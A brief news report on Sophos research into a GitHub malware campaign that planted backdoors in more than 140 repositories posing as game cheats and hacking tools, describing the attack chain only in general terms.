GitHub Malware Scam Tied to Single User, Hits Amateurs

A sprawling malware distribution campaign has compromised more than 140 GitHub repositories, targeting inexperienced cybercriminals and gaming cheat users through deceptive code laced with backdoors, according to researchers at Sophos. The scheme, attributed to a user linked with the email address ischhfd83@rambler.ru, dates back to at least November 2023.

Of the 141 repositories analyzed, 133 embedded malicious payloads, often disguised as game cheats or hacking tools. The most common infection method leverages Visual Studio’s PreBuild events to initiate a multi-stage attack chain, ultimately delivering obfuscated JavaScript payloads designed to disable security tools and deploy information-stealing malware such as AsyncRAT and Lumma Stealer.

Sophos traced the campaign after investigating Sakura RAT, a supposed open-source remote access Trojan. The repositories demonstrate signs of automation, with some showing tens of thousands of commits to mimic ongoing development. The operation’s sophistication suggests links to broader Distribution-as-a-Service models observed in recent cybercrime trends.